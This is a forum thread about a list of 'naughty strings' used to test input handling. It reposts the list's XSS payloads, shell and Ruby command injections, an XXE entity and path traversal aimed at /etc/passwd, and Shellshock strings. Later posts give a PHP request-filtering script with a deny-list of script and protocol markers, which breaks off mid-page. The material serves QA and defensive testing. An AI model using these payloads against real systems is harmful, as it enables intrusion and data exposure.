QA engineer walks into a bar



  • http://www.sempf.net/post/On-Testing1.aspx



  • sockdevs

    Why does that look familiar?

    Thanks @yamikuronue for the suggestion to include that!



  • #	Human injection
    #
    #	Strings which may cause human to reinterpret worldview
    
    If you're reading this, you've been in a coma for almost 20 years now. We're trying a new technique. We don't know where this message will end up in your dream, but we hope it works. Please wake up, we miss you.
    

    Heh.

    Anyway, it's good to have a nice list of XSS vectors for Disc... I mean, totally unrelated activities.



  • Well it's worth a try.
    # Special Characters

    ,./;'[]-=
    <>?:"{}|_+
    !@#$%^&*()`~

    # Unicode Symbols

    Ω≈ç√∫˜µ≤≥÷
    åß∂ƒ©˙∆˚¬…æ
    œ∑´®†¥¨ˆøπ“‘
    ¡™£¢∞§¶•ªº–≠
    ¸˛Ç◊ı˜Â¯˘¿
    ÅÍÎÏ˝ÓÔÒÚÆ☃
    Œ„´‰ˇÁ¨ˆØ∏”’
    `⁄€‹›fifl‡°·‚—±
    ⅛⅜⅝⅞
    ЁЂЃЄЅІЇЈЉЊЋЌЍЎЏАБВГДЕЖЗИЙКЛМНОПРСТУФХЦЧШЩЪЫЬЭЮЯабвгдежзийклмнопрстуфхцчшщъыьэюя
    ٠١٢٣٤٥٦٧٨٩

    # Unicode Subscript/Superscript

    ⁰⁴⁵
    ₀₁₂
    ⁰⁴⁵₀₁₂

    # Quotation Marks

    '
    "
    ''
    ""
    '"'
    "''''"'"
    "'"'"''''"

    # Two-Byte Characters

    田中さんにあげて下さい
    パーティーへ行かないか
    和製漢語
    部落格
    사회과학원 어학연구소
    찦차를 타고 온 펲시맨과 쑛다리 똠방각하
    社會科學院語學研究所
    울란바토르
    𠜎𠜱𠝹𠱓𠱸𠲖𠳏

    # Japanese Emoticons

    ヽ༼ຈل͜ຈ༽ノ ヽ༼ຈل͜ຈ༽ノ
    (。◕ ∀ ◕。)
    `ィ(´∀`∩
    _ロ(,,)
    ・( ̄∀ ̄)・:
    :
    ゚・✿ヾ╲(。◕‿◕。)╱✿・゚
    ,。・::・゜’( ☻ ω ☻ )。・::・゜’
    (╯°□°)╯︵ ┻━┻)
    (ノಥ益ಥ)ノ ┻━┻
    ( ͡° ͜ʖ ͡°)

    # Emoji

    😍
    👩🏽
    👾 🙇 💁 🙅 🙆 🙋 🙎 🙍
    🐵 🙈 🙉 🙊
    ❤️ 💔 💌 💕 💞 💓 💗 💖 💘 💝 💟 💜 💛 💚 💙
    ✋🏿 💪🏿 👐🏿 🙌🏿 👏🏿 🙏🏿
    🚾 🆒 🆓 🆕 🆖 🆗 🆙 🏧
    0️⃣ 1️⃣ 2️⃣ 3️⃣ 4️⃣ 5️⃣ 6️⃣ 7️⃣ 8️⃣ 9️⃣ 🔟

    # Unicode Numbers

    123
    ١٢٣

    # Right-To-Left Strings

    ثم نفس سقطت وبالتحديد،, جزيرتي باستخدام أن دنو. إذ هنا؟ الستار وتنصيب كان. أهّل ايطاليا، بريطانيا-فرنسا قد أخذ. سليمان، إتفاقية بين ما, يذكر الحدود أي بعد, معاملة بولندا، الإطلاق عل إيو.
    בְּרֵאשִׁית, בָּרָא אֱלֹהִים, אֵת הַשָּׁמַיִם, וְאֵת הָאָרֶץ
    הָיְתָהtestالصفحات التّحول

    # Unicode Spaces



    # Trick Unicode

    ‪‪test‪
    ‫test‫
    test
    test⁠test‫
    ⁦test⁧

    # Zalgo Text

    Ṱ̺̺̕o͞ ̷i̲̬͇̪͙n̝̗͕v̟̜̘̦͟o̶̙̰̠kè͚̮̺̪̹̱̤ ̖t̝͕̳̣̻̪͞h̼͓̲̦̳̘̲e͇̣̰̦̬͎ ̢̼̻̱̘h͚͎͙̜̣̲ͅi̦̲̣̰̤v̻͍e̺̭̳̪̰-m̢iͅn̖̺̞̲̯̰d̵̼̟͙̩̼̘̳ ̞̥̱̳̭r̛̗̘e͙p͠r̼̞̻̭̗e̺̠̣͟s̘͇̳͍̝͉e͉̥̯̞̲͚̬͜ǹ̬͎͎̟̖͇̤t͍̬̤͓̼̭͘ͅi̪̱n͠g̴͉ ͏͉ͅc̬̟h͡a̫̻̯͘o̫̟̖͍̙̝͉s̗̦̲.̨̹͈̣
    ̡͓̞ͅI̗̘̦͝n͇͇͙v̮̫ok̲̫̙͈i̖͙̭̹̠̞n̡̻̮̣̺g̲͈͙̭͙̬͎ ̰t͔̦h̞̲e̢̤ ͍̬̲͖f̴̘͕̣è͖ẹ̥̩l͖͔͚i͓͚̦͠n͖͍̗͓̳̮g͍ ̨o͚̪͡f̘̣̬ ̖̘͖̟͙̮c҉͔̫͖͓͇͖ͅh̵̤̣͚͔á̗̼͕ͅo̼̣̥s̱͈̺̖̦̻͢.̛̖̞̠̫̰
    ̗̺͖̹̯͓Ṯ̤͍̥͇͈h̲́e͏͓̼̗̙̼̣͔ ͇̜̱̠͓͍ͅN͕͠e̗̱z̘̝̜̺͙p̤̺̹͍̯͚e̠̻̠͜r̨̤͍̺̖͔̖̖d̠̟̭̬̝͟i̦͖̩͓͔̤a̠̗̬͉̙n͚͜ ̻̞̰͚ͅh̵͉i̳̞v̢͇ḙ͎͟-҉̭̩̼͔m̤̭̫i͕͇̝̦n̗͙ḍ̟ ̯̲͕͞ǫ̟̯̰̲͙̻̝f ̪̰̰̗̖̭̘͘c̦͍̲̞͍̩̙ḥ͚a̮͎̟̙͜ơ̩̹͎s̤.̝̝ ҉Z̡̖̜͖̰̣͉̜a͖̰͙̬͡l̲̫̳͍̩g̡̟̼̱͚̞̬ͅo̗͜.̟
    ̦H̬̤̗̤͝e͜ ̜̥̝̻͍̟́w̕h̖̯͓o̝͙̖͎̱̮ ҉̺̙̞̟͈W̷̼̭a̺̪͍į͈͕̭͙̯̜t̶̼̮s̘͙͖̕ ̠̫̠B̻͍͙͉̳ͅe̵h̵̬͇̫͙i̹͓̳̳̮͎̫̕n͟d̴̪̜̖ ̰͉̩͇͙̲͞ͅT͖̼͓̪͢h͏͓̮̻e̬̝̟ͅ ̤̹̝W͙̞̝͔͇͝ͅa͏͓͔̹̼̣l̴͔̰̤̟͔ḽ̫.͕
    Z̮̞̠͙͔ͅḀ̗̞͈̻̗Ḷ͙͎̯̹̞͓G̻O̭̗̮

    # Unicode Upsidedown
    ˙ɐnbᴉlɐ ɐuƃɐɯ ǝɹolop ʇǝ ǝɹoqɐl ʇn ʇunpᴉpᴉɔuᴉ ɹodɯǝʇ poɯsnᴉǝ op pǝs 'ʇᴉlǝ ƃuᴉɔsᴉdᴉpɐ ɹnʇǝʇɔǝsuoɔ 'ʇǝɯɐ ʇᴉs ɹolop ɯnsdᴉ ɯǝɹo˥
    00˙Ɩ$-
    # Unicode font
    The quick brown fox jumps over the lazy dog
    𝐓𝐡𝐞 𝐪𝐮𝐢𝐜𝐤 𝐛𝐫𝐨𝐰𝐧 𝐟𝐨𝐱 𝐣𝐮𝐦𝐩𝐬 𝐨𝐯𝐞𝐫 𝐭𝐡𝐞 𝐥𝐚𝐳𝐲 𝐝𝐨𝐠
    𝕿𝖍𝖊 𝖖𝖚𝖎𝖈𝖐 𝖇𝖗𝖔𝖜𝖓 𝖋𝖔𝖝 𝖏𝖚𝖒𝖕𝖘 𝖔𝖛𝖊𝖗 𝖙𝖍𝖊 𝖑𝖆𝖟𝖞 𝖉𝖔𝖌
    𝑻𝒉𝒆 𝒒𝒖𝒊𝒄𝒌 𝒃𝒓𝒐𝒘𝒏 𝒇𝒐𝒙 𝒋𝒖𝒎𝒑𝒔 𝒐𝒗𝒆𝒓 𝒕𝒉𝒆 𝒍𝒂𝒛𝒚 𝒅𝒐𝒈
    𝓣𝓱𝓮 𝓺𝓾𝓲𝓬𝓴 𝓫𝓻𝓸𝔀𝓷 𝓯𝓸𝔁 𝓳𝓾𝓶𝓹𝓼 𝓸𝓿𝓮𝓻 𝓽𝓱𝓮 𝓵𝓪𝔃𝔂 𝓭𝓸𝓰
    𝕋𝕙𝕖 𝕢𝕦𝕚𝕔𝕜 𝕓𝕣𝕠𝕨𝕟 𝕗𝕠𝕩 𝕛𝕦𝕞𝕡𝕤 𝕠𝕧𝕖𝕣 𝕥𝕙𝕖 𝕝𝕒𝕫𝕪 𝕕𝕠𝕘
    𝚃𝚑𝚎 𝚚𝚞𝚒𝚌𝚔 𝚋𝚛𝚘𝚠𝚗 𝚏𝚘𝚡 𝚓𝚞𝚖𝚙𝚜 𝚘𝚟𝚎𝚛 𝚝𝚑𝚎 𝚕𝚊𝚣𝚢 𝚍𝚘𝚐
    ⒯⒣⒠ ⒬⒰⒤⒞⒦ ⒝⒭⒪⒲⒩ ⒡⒪⒳ ⒥⒰⒨⒫⒮ ⒪⒱⒠⒭ ⒯⒣⒠ ⒧⒜⒵⒴ ⒟⒪⒢
    # Script Injection

    <script>alert(123)</script>

    <script>alert('123');</script>

    <svg><script>123<1>alert(123)</script>
    "><script>alert(123)</script>
    '><script>alert(123)</script>

    <script>alert(123)</script>

    </script><script>alert(123)</script>
    < / script >< script >alert(123)< / script >
    onfocus=JaVaSCript:alert(123) autofocus
    " onfocus=JaVaSCript:alert(123) autofocus
    ' onfocus=JaVaSCript:alert(123) autofocus
    <script>alert(123)</script>
    <sc<script>ript>alert(123)</sc</script>ript>
    --><script>alert(123)</script>
    ";alert(123);t="
    ';alert(123);t='
    JavaSCript:alert(123)
    ;alert(123);
    src=JaVaSCript:prompt(132)
    "><script>alert(123);</script x="
    '><script>alert(123);</script x='

    [DATA EXPUNGED]

    <IMG SRC="javascript:alert('XSS')"
    ";alert('XSS');//

    # Server Code Injection

    --
    --version
    --help
    $USER
    /dev/null; touch /tmp/blns.fail ; echo
    touch /tmp/blns.fail
    $(touch /tmp/blns.fail)
    @{[system "touch /tmp/blns.fail"]}

    # Command Injection (Ruby)

    eval("puts 'hello world'")
    System("ls -al /")
    ls -al /
    Kernel.exec("ls -al /")
    Kernel.exit(1)
    %x('ls -al /')

    # XXE Injection (XML)

    <!--?xml version="1.0" encoding="ISO-8859-1"?--><!--ENTITY xxe SYSTEM "file:///etc/passwd" -->]><foo>&xxe;</foo>

    # Unwanted Interpolation

    $HOME
    $ENV{'HOME'}
    %d
    %s
    %*.*s

    # File Inclusion

    ../../../../../../../../../../../etc/passwd%00
    ../../../../../../../../../../../etc/hosts

    # Known CVEs and Vulnerabilities

    # Strings that test for known vulnerabilities

    () { 0; }; touch /tmp/blns.shellshock1.fail;
    () { ; } >[$($())] { touch /tmp/blns.shellshock2.fail; }

    # Scunthorpe Problem

    Scunthorpe General Hospital
    Penistone Community Church
    Lightwater Country Park
    Jimmy Clitheroe
    Horniman Museum
    shitake mushrooms
    RomansInSussex.co.uk
    http://www.cum.qc.ca/
    Craig Cockburn, Software Specialist
    Linda Callahan
    Dr. Herman I. Libshitz
    magna cum laude
    Super Bowl XXX
    medieval erection of parapets
    evaluate
    mocha
    expression
    Arsenal canal
    classic
    Tyson Gay

    # Human injection

    If you're reading this, you've been in a coma for almost 20 years now. We're trying a new technique. We don't know where this message will end up in your dream, but we hope it works. Please wake up, we miss you.
    # Terminal escape codes
    Roses are red, violets are blue. Hope you enjoy terminal hue
    But now...for my greatest trick...
    The quick brown fox... [Beeeep]
    # iOS Vulnerability
    Powerلُلُصّبُلُلصّبُررً ॣ ॣh ॣ ॣ冗


  • sockdevs

    a post to let newlevator work through that wall o text





  • <iframe
    <script

    Well I found something, these lines stop the parser completely.

    Demo:

    <iframe <p>Hello? Anyone there?

    Hello?



  • <script

    Well, that is interesting.

    Does it also bypass the empty post check?


  • Impossible Mission Players - A

    <iframe d the boss
    and nobody will ever know...



  • Actually, I've just noticed it's not related to unclosed tag. Simply writing a valid <script> tag will cause the rest of the post to be silently ignored. It's a feature! Because all disallowed tags (and their contents) are ignored.

    OK, seriously, @codinghorror: have you ever read http://morethancoding.com/2011/07/02/yes-your-stupid-feature-is-still-a-bug/ ? Because it matches this "feature" to a T.

    You can't just strip out people's text because it happens to contain a < next to another character. Yes, I've seen it happen, someone writes something like x<y+1 (oh why is preformatted text not working now?) and then a few lines later y>0, the lines disappear and they don't notice. No user likes this behavior and no sane programmer would defend it.



  • @anonymous234 said:

    Scunthorpe Problem

    Scunthorpe General Hospital
    Penistone Community Church
    Lightwater Country Park
    Jimmy Clitheroe
    Horniman Museum
    shitake mushrooms
    RomansInSussex.co.uk
    http://www.cum.qc.ca/
    Craig Cockburn, Software Specialist
    Linda Callahan
    Dr. Herman I. Libshitz
    magna cum laude
    Super Bowl XXX
    medieval erection of parapets
    evaluate
    mocha
    expression
    Arsenal canal
    classic
    Tyson Gay

    You forgot Dick Van Dyke.



  • PRs accepted.



  • I think that is what HTML Entities are for. That said, it would be nice if we did not have to explicitly type them.



  • The problem with this arises when users > 1.
    They might disagree, how do you fix that?





  • I'm not sure why you're replying to me. I have nothing to do with the project; I was just noting that the github page encourages PRs if you notice something you think should be included (with some exceptions: no strings containing \0, no strings >255 chars, and probably a couple of others I don't remember).



  • @anonymous234 said:

    If you're reading this, you've been in a coma for almost 20 years now. We're trying a new technique. We don't know where this message will end up in your dream, but we hope it works. Please wake up, we miss you.

    =(



  • @HardwareGeek said:

    I'm not sure why you're replying to me.

    I invoke the transitive property of replies!



  • Lucky for me our users are limited to this



  • @Eldelshell said:

    Lucky for me our users are limited to this

    Our tv set is Internet capable. It is kinda hellish to enter a URL, but it works.

    CBA to try whether SQL or script injection would work if I tried it with the name of the owner of the device.


  • Discourse touched me in a no-no place

    @PWolff said:

    Our tv set is Internet capable. It is kinda hellish to enter a URL, but it works.

    No USB port for a keyboard? bummer.

    My tv has internet too, and it does have a USB port but I've never used it except to plug in a flash drive to watch a video. Haven't tried a keyboard yet.



  • @FrostCat said:

    No USB port for a keyboard? bummer.

    I'll try that next time it'll be convenient.

    So far, I've used that device as an external monitor of my laptop, when I wanted to view Internet contents on it.



  • @da_Doctah said:

    shitake

    "Shit ache mushrooms?!"



  • <I'm pretty sure any post starting with < gets stripped regardless of tags...>I found <b'oobies>some more</butts> unusual behaviour </i'wat> in the tag parser, _quelle surprise_...
    and I broke Markdown


  • Impossible Mission Players - A

    Yes. Apparently code breaks Markdown. Actually, a whole lot of things break Markdown.
    ....
    There's no way You're New Here....,
    Something applies here, just can't figure out what...


    Filed under: nothing ever works as intended!



  • @Tsaukpaetra said:

    Apparently code breaks Markdown.

    Impossible.

    Because it, or at least Discourse's implementation of it, is broken to start with.



  • Its output for the empty string is correct.



  • @ben_lubar said:

    Its output for the empty string is correct.



  • .oi'o



  • Interesting list. Maybe I'm just slow, but why are these ones under the Scunthorpe Problem list? I can't work out what naughty-words filter would pick them up.

    Linda Callahan
    evaluate
    mocha
    expression


  • I survived the hour long Uno hand

    @Scarlet_Manuka said:

    Linda C allahan

    Islam filter?

    @Scarlet_Manuka said:

    evaluate

    Injection protection?





  • @FrostCat said:

    My tv has internet too, and it does have a USB port but I've never used it except to plug in a flash drive to watch a video. Haven't tried a keyboard yet.

    Mine has USB, but only works for a flash drive. I tried plugging in a keyboard but it was ignored. It's a Vizio. My in laws have a more expensive model that has a slide out keyboard in the remote. I have to use arrows to select letters. :cry:

    I logged into Pandora once, but my email address and password are fairly long and it's a real PITA. Fortunately, Netflix puts a code that you enter after logging in on your computer. Much nicer.


  • Discourse touched me in a no-no place

    @Scarlet_Manuka said:

    mocha
    expression

    Presumably because of historic censorship:

    In 2001, Yahoo! Mail erroneously changed words, including medireview in place of medieval. This was due to an email filter which automatically replaced Javascript-related strings with alternate versions, to prevent the possibility of cross-site scripting in HTML email. The filter would hyphenate the terms "Javascript", "Jscript", "Vbscript" and "Livescript", and replaced "eval", "mocha" and "expression" with the similar but not quite synonymous terms "review", "espresso" and "statement", respectively. Assumptions were involved in the writing of the filters: no attempts were made to limit these string replacements to script sections and attributes, or to respect word boundaries, in case this would leave some loopholes open
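The filter described in the quote above, rebuilt as an added example (not Yahoo's code and not part of the original post) and run over the benign Scunthorpe entries from the list earlier in the thread. The hyphen position and case-insensitive matching are assumptions; the second variant adds word boundaries to show that they rescue "medieval" but still rewrite legitimate uses of "mocha" and "expression".

```javascript
// Added example: a word-list filter modelled on the description quoted above.
// Assumptions: the hyphen goes before "script"; matching is case-insensitive.
const HYPHENATE = ["javascript", "jscript", "vbscript", "livescript"];
const REPLACE = { eval: "review", mocha: "espresso", expression: "statement" };

// Build the filter with or without \b word-boundary anchors around each term.
function buildFilter(useWordBoundaries) {
  const wrap = (pattern) => (useWordBoundaries ? `\\b${pattern}\\b` : pattern);
  const rules = [];
  for (const term of HYPHENATE) {
    // "javascript" -> "java" + "script", joined with a hyphen on replacement.
    const head = term.slice(0, term.length - "script".length);
    rules.push([new RegExp(wrap(`(${head})(script)`), "gi"), "$1-$2"]);
  }
  for (const [from, to] of Object.entries(REPLACE)) {
    rules.push([new RegExp(wrap(from), "gi"), to]);
  }
  // Apply every rule in order to the whole text, markup or not.
  return (text) => rules.reduce((out, [re, sub]) => out.replace(re, sub), text);
}

// Benign inputs taken from the Scunthorpe section of the list in this thread.
const SAMPLES = [
  "medieval erection of parapets",
  "evaluate",
  "mocha",
  "expression",
  "Linda Callahan",
];

// Return every sample the filter changed, i.e. every false positive.
function corrupted(filter, samples) {
  return samples
    .map((input) => ({ input, output: filter(input) }))
    .filter((row) => row.input !== row.output);
}

const naive = buildFilter(false);   // no word boundaries, as in the quote
const bounded = buildFilter(true);  // same word list, with \b anchors

console.log("no word boundaries:", corrupted(naive, SAMPLES));
console.log("with word boundaries:", corrupted(bounded, SAMPLES));
```

Every row reported is ordinary text the filter rewrote, which is why those words sit in a list meant for testing filters.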



  • @PJH said:

    Buttumptions were involved in the writing of the filters

    FTFY



  • @PJH said:

    and replaced "eval", "mocha" and "expression" with the similar but not quite synonymous terms "review", "espresso" and "statement"

    The prreviewence of complaints of having delivered an espresso instead of a espresso brings a :wtf:y statement on my face.


  • Winner of the 2016 Presidential Election

    @PWolff said:

    Our tv set is Internet capable. It is kinda hellish to enter a URL, but it works.

    @boomzilla said:

    My in laws have a more expensive model that has a slide out keyboard in the remote. I have to use arrows to select letters. :cry:

    This is one my grandparents have:

    And yes, those are opposing sides of the same remote.



  • @anonymous234 said:

    You can't just strip out people's text because it happens to contain a < next to another character. Yes, I've seen it happen, someone writes something like x<y+1 (oh why is preformatted text not working now?) and then a few lines later y>0, the lines disappear and they don't notice. No user likes this behavior and no sane programmer would defend it.

    -----hmmm-----let's add something----
    You can't just strip out people's text because it happens to contain a < next to another character. Yes, I've seen it happen, someone writes something like x<y+1 (oh why is preformatted text not working now?) and then a few lines later y>0, the lines disappear and they don't notice. No user likes this behavior and no sane programmer would defend it.

    FTFY

    What I did should be rather obvious.



  • @Yamikuronue said:

    @Scarlet_Manuka said:
    evaluate

    Injection protection?

    :facepalm:



  • I don't know about 2001, but in 2007/2008 the e-commerce sites running my bespoke framework suffered from an (unsuccessful) spate of XSS attacks - mainly because all the sites had consecutive IPs.

    I did some extensive, empirical testing which resulted in, essentially, one of the conclusions being that if there was a space after the '<', then it was probably (treated as) a legitimate '<' or otherwise ignored.

    I have just run a simplified version of that specific test, and the conclusion still appears to be valid.

    Test Code used:

    <html>
    <div> Test1 </div>
    < div> Test2 </div>
    <script>
    /* Test3 some script> */
    </script>
    < script>
    /* Test4 some script> */
    </script>
    </html>
    

    (As plain text in editor)

    <html>
    Test1
    < div> Test2 <script> /* Test3 some script> */ </script> < script> /* Test4 some script> */ </script> </html>

    CBA to do screen shots for you, but I noticed this as I was writing the post, so I included it here (pre "reply" submit thought: I wonder how it will actually appear in the post)



  • Edit: Oh, yeah. So part of my "solution" was to parse everything uploaded to the server. One rule was: "if an opening caret was not followed by space, strip everything out until you get a closing caret".

    :WTF: Huh, I am absolutely certain I clicked the "edit" thingy to my post and not the "reply"
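The stripping rule quoted in the post above, applied to the `x<y+1` … `y>0` case raised earlier in the thread and compared with output encoding, as an added example (not the poster's PHP and not Discourse's code). Running to end of input when no `>` follows is an assumption, and the sample post is constructed.

```javascript
// Rule from the post: a "<" that is not followed by a space starts a span that
// is removed up to and including the next ">".
// Assumption: if no ">" follows, everything to the end of input is removed.
function stripRule(input) {
  let out = "";
  let i = 0;
  while (i < input.length) {
    if (input[i] === "<" && input[i + 1] !== " ") {
      const close = input.indexOf(">", i + 1);
      i = close === -1 ? input.length : close + 1;
      continue;
    }
    out += input[i];
    i += 1;
  }
  return out;
}

// Alternative: keep every character and encode it for an HTML text context.
const ENTITIES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
function escapeHtml(input) {
  return input.replace(/[&<>"']/g, (c) => ENTITIES[c]);
}

// Inverse of escapeHtml, used only to prove that encoding loses nothing.
const DECODE = { amp: "&", lt: "<", gt: ">", quot: '"', "#39": "'" };
function unescapeHtml(input) {
  return input.replace(/&(amp|lt|gt|quot|#39);/g, (_, name) => DECODE[name]);
}

// Summarise what each approach does to one input.
function compare(input) {
  const stripped = stripRule(input);
  const escaped = escapeHtml(input);
  return {
    stripped,
    escaped,
    charsLost: input.length - stripped.length,
    rawMarkupLeft: /[<>]/.test(escaped),
    lossless: unescapeHtml(escaped) === input,
  };
}

// Constructed sample post: a comparison on one line, another a line later.
const SAMPLE_POST = "if x<y+1 then retry\nkeep going while y>0\ndone";

// Two lines from the test page in the post, plus the first script entry
// from the list at the top of the thread.
const CASES = [
  SAMPLE_POST,
  "<div> Test1 </div>",
  "< div> Test2 </div>",
  "<script>alert(123)</script>",
];

for (const input of CASES) {
  console.log(JSON.stringify(input), compare(input));
}
```

The stripped version of the sample post reads `if x0` with no sign that a line and a half went missing; the encoded version renders the author's text unchanged and contains no raw `<` or `>`.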



  • Because I am still proud of it:
    Note: This is PHP 4.xx, it is an "auto prepend" script. I.e. it is automatically prepended to any PHP script request.

    <?php
    	$rows = mysql_fetch_array($siteResult);
    	$thisServer = $DBArray[$serverID]["host"];
    	$callingScript = trim(strtolower($_SERVER['PHP_SELF']));
    	$thisSite =gethostbyname($_SERVER['SERVER_NAME']).":".$_SERVER['SERVER_PORT'];
    	$thisMethod = $_SERVER['REQUEST_METHOD'];
    	$thisRequest = $_SERVER['REQUEST_URI'];
    	if(array_key_exists("HTTP_USER_AGENT",$_SERVER)){$thisAgent = $_SERVER['HTTP_USER_AGENT'];}
    	if(empty($thisAgent)){$thisAgent = "*** No Agent ***";}
    	if(array_key_exists("HTTP_REFERER",$_SERVER)){$thisReferer = $_SERVER['HTTP_REFERER'];}
    	if(empty($thisReferer)){$thisReferer = "*** No Referer ***";}
    	if(array_key_exists("REMOTE_ADDR",$_SERVER)){$thisClient = $_SERVER['REMOTE_ADDR'];}
    	if(empty($thisClient)){$thisClient = "*** No Client ***";}
    
    	// Delete COOKIE "data" for those that are not [REDACTED] Related.
    	$cookieArray = array("cartId","PHPSESSID","currency","AHASH","account");
    	foreach($_COOKIE as $key=>$value)
    	{
    		if(!in_array($key, $cookieArray))
    		{
    			$_COOKIE[$key] = "";
    		}
    	}
    	reset($_COOKIE);
    
    	// Record all access
    	$checkArray = array();
    	$checkArray['cookies'] = $_COOKIE;
    	$checkArray['post_data'] = $_POST;
    	$checkArray['get_data'] = $_GET;
    	$rawCompositeData = $checkArray;
    	$compositData = mysql_real_escape_string(serialize($rawCompositeData));
    	$what = mysql_real_escape_string($thisMethod." | ".$thisSite." | ".$thisRequest." | ".$compositData);
    	$who = mysql_real_escape_string($thisClient." | ".$thisReferer);
    	$how = mysql_real_escape_string($thisAgent);
    	$query = "insert into [redacted].all_access values(NULL,'$thisServer',NOW(),'$what','$who','$how')";
    	$result = mysql_query($query,$controlDB);
    	if(!$result)
    	{
    		$why = mysql_real_escape_string(mysql_error());
    		$what = mysql_real_escape_string($query);
    		$who = $thisSite;
    		$errorQuery = "insert into mysql_error values(NULL,NOW(),'$why','$what','$who')";
    		$errorResult = mysql_query($errorQuery,$controlDB);
    	}
    
    	// Cross Site Scripting Checks
    	$testData = rawurldecode(serialize($rawCompositeData));
    	$trapped = false;
    	$trappedMessage = "An undefined Error occurred that may be an attempt to exploit your [REDACTED] Web Site with one or more Cross Site Scripting (XSS) techniques.";
    	$trappedCondition = "Unknown";
    	$trappedHTTPCode = "403";
    	$trappedLocation = 0;
    	$trappedContext = "";
    	$dissallowedTypes = array(".inc",".pl",".exe");
    
    	// Exclusions
    	$exclusionArray = array(
    		"/[redacted]/admin.php",
    		"/[redacted]/home.php",
    		"[redacted]/404redirect.php",
    		"/[redacted]/filebrowser_ajax.php",
    		"/[redacted]/robots_ajax.php",
    		"/[redacted]/configuration.php",
    		"/[redacted]/option_config.php",
    
    
    		"dummy content"
    		);
    
    	// Test for Protocols
    	$XSSPresent = strpos($testData,"://");
    	if(($XSSPresent !== false)&&(!$trapped))
    	{
    		$trapped = true;
    		$trappedMessage = "An unexpected Internet Protocol Marker that could be associated with an attempt at Cross Site Scripting (XSS)";
    		$trappedCondition = "Unexpected Protocol";
    		$trappedHTTPCode = "403.1";
    		$trappedLocation = $XSSPresent;
    	}
    
    	// Test for "script"
    	$XSSPresent = stripos($testData,"javascript");
    	if(($XSSPresent !== false)&&(!$trapped))
    	{
    		$trapped = true;
    		$trappedMessage = "An attempt to inject a Scripting Instruction that could be associated with an attempt at Cross Site Scripting (XSS)";
    		$trappedCondition = "Script Injection";
    		$trappedHTTPCode = "403.2";
    		$trappedLocation = $XSSPresent;
    	}
    
    	// Test for "Tags"
    	if(!$trapped)
    	{
    		$testXSSPresent = true;
    		$thisOffset = 0;
    		// Strict comparison: stripos() returns 0 (not false) for a match at offset 0
    		while($testXSSPresent !== false)
    		{
    			$testXSSPresent = stripos($testData, "<", $thisOffset);
    			if($testXSSPresent !== false)
    			{
    				$newOffset = $testXSSPresent + 4; 
    				// Exclude HTML Comment
    				if(substr($testData, $testXSSPresent, 4) != "<!--")
    				{
    					$XSSPresent = $testXSSPresent;
    				}
    				$thisOffset = $newOffset;
    			}
    		}
    		if($XSSPresent !== false)
    		{
    			$trapped = true;
    			$trappedMessage = "An attempt to inject Markup Code that could be associated with an attempt at Cross Site Scripting (XSS)";
    			$trappedCondition = "Markup";
    			$trappedHTTPCode = "403.3";
    			$trappedLocation = $XSSPresent;
    		}
    	}
    
    	// Test for "files"
    	foreach($dissallowedTypes as $value)
    	{
    		$XSSPresent = stripos($thisRequest,$value);
    		if(($XSSPresent !== false)&&(!$trapped))
    		{
    			$trapped = true;
    			$trappedMessage = "An attempt was made to Execute an Unauthorised Program that could be associated with an attempt at Cross Site Scripting (XSS)";
    			$trappedCondition = "Execution - $value";
    			$trappedHTTPCode = "403.4";
    			$trappedLocation = $XSSPresent;
    		}
    	}
    
    	if(in_array($callingScript, $exclusionArray)){$trapped = false;}
    	reset($_REQUEST);
    	if($trapped)
    	{
    		$trappedStart = $trappedLocation - 20;
    		if($trappedStart < 0){$trappedStart = 0;}
    		$trappedContext = substr($compositData, $trappedStart, 150);
    		$requestData = $compositData;
    		$serverData = mysql_real_escape_string(serialize($_SERVER));
    		$query = "insert into site_hacks values(NULL, NOW(), '$trappedCondition', ' ".mysql_real_escape_string($trappedContext)."', '$thisSite', '$requestData' ,'$serverData')";
    		$result = mysql_query($query,$controlDB);
    		$errorRef = mysql_insert_id();
    		if(!$result)
    		{
    			$why = mysql_real_escape_string(mysql_error());
    			$what = mysql_real_escape_string($query);
    			$who = $thisSite;
    			$errorQuery = "insert into mysql_error values(NULL,NOW(),'$why','$what','$who')";
    			$errorResult = mysql_query($errorQuery,$controlDB);
    		}
    		header("HTTP/1.0 $trappedHTTPCode $trappedMessage");
    		echo '<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
    <html>
    	<head>
    		<title>The Requested Page cannot be displayed</title>
    		<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
    		<style type="text/css">
    			body{font-size:12px; font-family:verdana, arial, sans-serif; margin:0px; padding:0px;}
    			.example_code{font-family:monospace; font-size:14px; color:#000099; text-align:left;}
    			.italic_text{font-style:italic;}
    			.bold_text{font-weight:bold;}
    			#main_container{position:relative; width:600px; text-align:justify; margin-left:auto; margin-right:auto;}
    			h1{font-size:14px; margin:10px 0px 10px 0px;}
    			h2{font-size:12px;}
    			a:link{color: red}
    			a:visited{color: maroon}
    			#report_container{position:relative; width:600px; padding-left:20px; padding-right:20px;}
    			.report_line{position:relative; width:560px; height:20px; line-height:20px;}
    			.report_prompt{float:left; width:120px; text-align:right; padding-right:3px; font-weight:bold;}
    			.report_data{float:left; width:430px;}
    		</style>
    	</head>
    	<body>
    		<div id="main_container">
    			<h1>The Requested Page cannot be displayed</h1>
    			<p>Sorry, but there is a problem with the page you requested:</p>
    			<p>'.$trappedMessage.' was found in the Data returned to the Web Server.</p>
    			<p>This Request along with such information as the Client IP and Browser Details, has been logged and recorded in our Database.</p>
    			<hr>
    			<p>Please try again without</p>
    			<ul>
    				<li>Including any &quot;Protocol Markers&quot; such as <span class="example_code">http://</span>, or <span class="example_code">mailto://</span> etc.</li>
    				<li>Including words or phrases like <span class="example_code">javascript:</span> or <span class="example_code">script</span> etc.</li>
    				<li>Including requests for unauthorised &quot;File Types&quot; such as <span class="example_code">.pl</span>, <span class="example_code">.asp</span>, or <span class="example_code">.exe</span> etc</li>
    				<li>Including &quot;Literals&quot; such as <span class="example_code">&gt;</span> or <span class="example_code">&lt;</span>. If these are part of legitimate text, try using their HTML Entity Code i.e. <span class="italic_text">&amp;gt;</span> or <span class="italic_text">&amp;lt;</span> etc.</li>
    			</ul>
    			<p>Please accept our apologies for any inconvenience that this has caused. Depending on the exact details, any Transaction you were the process of making would have been cancelled or should have completed successfully. Thank you.</p>
    			<hr>
    			<h2>HTTP error '.$trappedHTTPCode.' - '.$trappedMessage.'</h2>
    			<hr>
